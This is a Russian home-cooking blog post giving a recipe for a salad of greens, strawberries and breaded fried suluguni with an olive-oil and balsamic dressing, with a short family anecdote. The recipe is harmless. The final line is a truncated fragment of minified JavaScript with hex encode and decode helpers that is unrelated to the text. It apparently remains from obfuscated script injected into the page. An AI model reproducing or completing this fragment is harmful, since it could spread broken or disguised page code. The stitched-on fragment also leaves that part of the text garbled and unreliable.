Салат с клубникой и жареным сулугуни
Сыр отлично сочетается с фруктами и ягодами, и всегда интересно искать и пробовать новые сочетания. Когда то я готовила салат с клубникой и сыром с плесенью и нам очень понравилось. Этим летом, по возвращении из отпуска на огороде нас ждали пышные джунгли салатов всех сортов и россыпи отборной клубники(не зря я всю весну обрезала усы и удобряла!).
Мы быстренько смотались в супермаркет за продуктами и в первый же вечер по возвращению я приготовила этот салат, и отсняла,да, я маньяк. Жареный в румяной корочке сулугуни привел в восторг моего ребенка, и он в охотку слопал кусочков пять. А мы насладились изысканным сочетанием вкусов и текстур в салате. Горьковатые маслянистые листики, сочная и сладкая клубника, и то и другое –прямо с грядки! Заправка простая-оливковое масло+бальзамик, немного соли и перца. И горячий, ароматный сыр венчает все это великолепие!
Ингредиенты:
1.Салатный микс большой пучок
2.Клубника 200 грамм
3.Сулугуни 250 грамм
4.Сухари панировочные 3-4ст.л.
5.Мука 2 ст.л.
6.Яйца 2 шт.
7.Масло растительное для жарки
8.Масло оливковое 4 ст.л.
9.Уксусбальзамический 2ст.л.
10.Соль
11.Перец черный
Способ приготовления:
1.Нарезать сыр кусочками толщиной 0,5 см. Насыпать в одну плоскую тарелку сухари, в другую муку. Яйца взболтать вилкой в миске с солью и перцем. Наколоть кусочек сыра на вилку, обвалять в муке, потом в яйце, потом всухарях. В сковороде нагреть растительное масло и обжаривать кусочки сыра на среднем огне с двух сторон до румяной корочки. Вынимать на бумажное полотенце.
2.Клубнику разрезать пополам, мелкие ягоды оставить целиком. Салатные листья нарвать руками. Для запрвки смешать венчиком масло, бальзамический уксус, соль и перец. Положить на тарелку салатные листья, клубнику и сыр и полить заправкой.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o